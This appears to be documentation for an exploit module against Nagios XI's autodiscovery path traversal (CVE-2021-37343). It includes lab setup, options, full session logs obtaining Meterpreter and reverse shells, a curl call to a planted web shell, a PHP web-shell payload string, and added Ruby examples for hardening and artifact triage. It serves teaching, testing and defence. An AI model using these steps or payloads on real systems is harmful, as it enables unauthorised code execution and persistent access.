/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
## Vulnerable Application

### Description

This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path
traversal allows a remote, authenticated administrator to upload a PHP web shell and execute code as
`www-data`. The module achieves this by creating an autodiscovery job whose `id` field contains a
path traversal to a directory that is both writable by the application and reachable over HTTP, and whose
`custom_ports` field contains the web shell. Nagios XI creates a cron file for the job using the attacker's
chosen path and name and embeds the `custom_ports` value verbatim in that file. Because the file ends up under
the web root with a `.php` extension, requesting it over HTTP executes the embedded PHP, while the rest of the
cron line is simply echoed back (the last scenario below shows this).

After the web shell has been written to the target, the module uses it to establish a Meterpreter session
or a reverse shell. By default the module then deletes the web shell and removes the autodiscovery job.
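To make the bug class concrete, here is an added Ruby example. It is not the module's code and not Nagios XI's source: the directory names are taken from the scenario output further down, while the function names, the abridged shape of the cron line and the PHP payload string are assumptions for illustration. It shows the vulnerable pattern (the job `id` joined onto the jobs directory with no normalisation) beside a hardened version that only accepts a single plain path component and additionally verifies the resolved path stays under the jobs directory.

```ruby
# Added example (not from the Metasploit module or Nagios XI): a simplified
# model of CVE-2021-37343. The job "id" from the web UI is joined onto the
# autodiscovery jobs directory without normalisation, so an id containing
# "../" segments makes the generated cron file (and its .xml/.watch/.out side
# files) land wherever the attacker chooses. Directory names come from the
# module output; function names and the cron line shape are assumptions.
require "pathname"

JOBS_DIR = "/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs"
TEMP_DIR = "/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp"

# Vulnerable pattern: raw interpolation, no check that the result stays
# inside JOBS_DIR.
def job_paths_vulnerable(id)
  base = "#{JOBS_DIR}/#{id}"
  { cron: base, xml: "#{base}.xml", watch: "#{base}.watch", out: "#{base}.out" }
end

# Abridged model of the autodiscovery cron line (compare the line the web
# shell echoed back in the last scenario). custom_ports is embedded verbatim,
# which is why a PHP tag in it becomes a web shell once the file sits under
# the web root with a .php name.
def cron_line(id, custom_ports)
  p = job_paths_vulnerable(id)
  "0 9 * * * rm -f '#{p[:xml]}'; touch '#{p[:watch]}'; " \
  "sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php " \
  "--output='#{p[:xml]}' --watch='#{p[:watch]}' --customports='#{custom_ports}' " \
  "> '#{p[:out]}' 2>&1 &"
end

# Does a path, once normalised, escape the jobs directory? Excess ".." above
# "/" is dropped, exactly as the kernel does when resolving the path.
def escapes_jobs_dir?(path)
  !Pathname.new(path).cleanpath.to_s.start_with?("#{JOBS_DIR}/")
end

# Hardened pattern: the id must be one plain path component (no "/" or "."),
# and as defence in depth the resolved path must still be under JOBS_DIR.
# Returns nil on rejection so a caller cannot accidentally use a bad path.
def job_paths_hardened(id)
  return nil unless id.match?(/\A[A-Za-z0-9_-]{1,64}\z/)
  resolved = Pathname.new(JOBS_DIR).join(id).cleanpath.to_s
  return nil unless resolved.start_with?("#{JOBS_DIR}/")
  { cron: resolved, xml: "#{resolved}.xml", watch: "#{resolved}.watch", out: "#{resolved}.out" }
end

if __FILE__ == $0
  # Ten "../" segments are more than enough to reach "/" from JOBS_DIR.
  traversal_id = "../" * 10 + TEMP_DIR[1..-1] + "/lobster.php"
  puts cron_line(traversal_id, "<?php system($_GET['cmd']); ?>")  # payload string is an assumption
  puts "vulnerable path escapes jobs dir: #{escapes_jobs_dir?(job_paths_vulnerable(traversal_id)[:cron])}"
  p job_paths_hardened(traversal_id)   # nil: rejected
  p job_paths_hardened("job_1")        # paths under JOBS_DIR
end
```

Note on the traversal length: once enough `../` segments have been supplied to reach `/`, any extra ones are ignored during path resolution, so an over-long traversal resolves to the same absolute path as a minimal one. That is why a generous default for the module's `DEPTH` option works across installs without the attacker having to count directories.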
### Installation

The following was tested on Ubuntu 20.04.

* `wget https://assets.nagios.com/downloads/nagiosxi/5/xi-5.8.4.tar.gz`
* `tar -xvf xi-5.8.4.tar.gz`
* `cd nagiosxi`
* `sudo ./fullinstall`

The installer will spend a good deal of time installing many things. Upon completion, navigate to
the Web UI, accept the license agreements, and configure the administrator username and password.
## Verification Steps

* Follow the instructions above to install Nagios XI 5.8.4 on Ubuntu 20.04
* Do: `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
* Do: `set RHOST <ip>`
* Do: `set PASSWORD <password>`
* Do: `check`
* Verify the target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `run`
* You should get a Meterpreter session.

Note that `check` authenticates to the web interface and decides based on the version the server reports
(the scenario output below prints `Determined using the self-reported version`), not by exercising the
traversal itself.
## Options

### TARGETURI

Specifies the base URI. The default value is `/nagiosxi`.

### USERNAME

The username to log in to the Nagios XI web interface with. The default is `nagiosadmin`.

### PASSWORD

The password to log in with. There is no default (`nil`); it must be set.

### DEPTH

The depth of the path traversal. The default is 10.

### WEBSHELL_NAME

The file name to give the web shell. If no name is provided, one is generated automatically.
There is no default (`nil`).

### DELETE_WEBSHELL

Indicates whether the web shell should be deleted after the Meterpreter session or reverse shell is established.
The default is `true`. Set it to `false` to leave the web shell behind for persistence. Be aware that the shell
is reachable without authentication (the last scenario fetches it with a plain `curl`) and runs commands as
`www-data`, so anyone who finds it gets code execution on the target; remove it by hand when it is no longer
needed.
## Scenarios

### Nagios XI 5.8.4 - Get a Meterpreter Session

```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.8.4
[+] The target appears to be vulnerable to the following 1 exploit(s):
[*]
[*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
[*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44224 ) at 2022-02-05 17:53:27 -0800
meterpreter > shell
Process 800816 created.
Channel 1 created.
uname -a
Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
whoami
www-data
pwd
/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
```
### Nagios XI 5.8.4 - Get a reverse shell

```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.8.4
[+] The target appears to be vulnerable to the following 1 exploit(s):
[*]
[*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
[*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
target => 0
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
[*] Started reverse double SSL handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Executing Unix Command for cmd/unix/reverse_openssl
[*] Deleting autodiscovery job
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nyjlVFXNgWehsWFs;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nyjlVFXNgWehsWFs\n"
[*] Matching...
[*] A is input...
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44226 ) at 2022-02-05 17:56:49 -0800
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
pwd
/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
```
### Nagios XI 5.8.4 - Leave a web shell behind

```
msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
DELETE_WEBSHELL => false
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
WEBSHELL_NAME => lobster.php
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44230 ) at 2022-02-05 18:07:14 -0800
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 10.0.0.6 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > exit
albinolobster@ubuntu:~/metasploit-framework$ curl --insecure https://10.0.0.6/nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php?cmd=id
0 9 * * * rm -f '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml'; touch '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch'; sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses='127.0.0.1/0' --exclude='' --output='../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml' --watch='/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch' --onlynew=0 --debug=1 --detectos=1 --detecttopo=1 --customports='uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
' > '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.out' 2>&1 & echo $! > /dev/null 2>&1
```
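The output above shows exactly what a run with `DELETE_WEBSHELL false` leaves on the target: a `.php` file in the highcharts `exporting-server/temp` directory, and an autodiscovery cron line whose job paths contain `../` and whose `--customports` argument carried the PHP payload. The following Ruby script is an added example for the defensive side and is not part of the module or of Nagios XI. It turns those artifacts into a simple triage check. The sample cron lines and the directory listing are constructed for the example and modelled on the output above, the version boundary (fixed in 5.8.5) comes from the module description, and the assumption that a `.php` file does not belong in that temp directory is the author's, not something the page states.

```ruby
# Added example (not from the Metasploit module or Nagios XI): triage for the
# artifacts this exploit leaves behind. The sample inputs are constructed to
# mirror the scenario output; in a real investigation you would feed it the
# autodiscovery cron entries and a listing of the exporting-server temp dir.
require "rubygems"

JOBS_DIR = "/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs"
TEMP_DIR = "/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp"
FIXED_VERSION = Gem::Version.new("5.8.5")   # module description: before 5.8.5 is affected

# Version check, the same basis the module's "check" uses (self-reported version).
def version_vulnerable?(version)
  Gem::Version.new(version) < FIXED_VERSION
end

# An autodiscovery cron line is suspicious if one of its job paths walks out of
# the jobs directory, or if the custom ports argument carries a PHP tag.
def cron_line_findings(line)
  findings = []
  if line.include?("#{JOBS_DIR}/..") || line.match?(%r{--output='[^']*\.\./})
    findings << "path traversal in job path"
  end
  findings << "PHP tag inside --customports" if line.match?(/--customports='[^']*<\?php/)
  findings
end

# Assumption: the exporting-server temp directory holds exported chart files,
# so any .php file there is a web shell candidate.
def stray_php_files(listing)
  listing.select { |name| name.downcase.end_with?(".php") }
end

def triage(version, cron_lines, temp_listing)
  {
    vulnerable_version: version_vulnerable?(version),
    suspicious_cron: cron_lines.map { |l| cron_line_findings(l) }.reject(&:empty?),
    webshell_candidates: stray_php_files(temp_listing).map { |f| "#{TEMP_DIR}/#{f}" },
  }
end

# Constructed samples, modelled on the scenario output: one legitimate job and
# one written by the exploit. The PHP payload string is an assumption.
TRAVERSAL = "../" * 28 + TEMP_DIR[1..-1]
SAMPLE_CRON = [
  "0 9 * * * rm -f '#{JOBS_DIR}/job_5.xml'; touch '#{JOBS_DIR}/job_5.watch'; " \
  "sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php " \
  "--addresses='10.0.0.0/24' --exclude='' --output='job_5.xml' --watch='#{JOBS_DIR}/job_5.watch' " \
  "--customports='22,80,443' > '#{JOBS_DIR}/job_5.out' 2>&1 &",
  "0 9 * * * rm -f '#{JOBS_DIR}/#{TRAVERSAL}/lobster.php.xml'; touch '#{JOBS_DIR}/#{TRAVERSAL}/lobster.php.watch'; " \
  "sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php " \
  "--addresses='127.0.0.1/0' --exclude='' --output='#{TRAVERSAL}/lobster.php.xml' " \
  "--customports='<?php system($_GET['cmd']); ?>' > '#{JOBS_DIR}/#{TRAVERSAL}/lobster.php.out' 2>&1 &",
]
SAMPLE_TEMP_LISTING = %w[chart-1.png chart-2.svg lobster.php]

if __FILE__ == $0
  r = triage("5.8.4", SAMPLE_CRON, SAMPLE_TEMP_LISTING)
  puts "version vulnerable: #{r[:vulnerable_version]}"
  r[:suspicious_cron].each { |f| puts "suspicious cron line: #{f.join(', ')}" }
  r[:webshell_candidates].each { |path| puts "web shell candidate: #{path}" }
end
```

Because the module removes the autodiscovery job by default, the cron line may already be gone by the time you look; the `.php` file in the temp directory (when `DELETE_WEBSHELL` was `false`) and the web server's access log entries for that path are the longer-lived indicators.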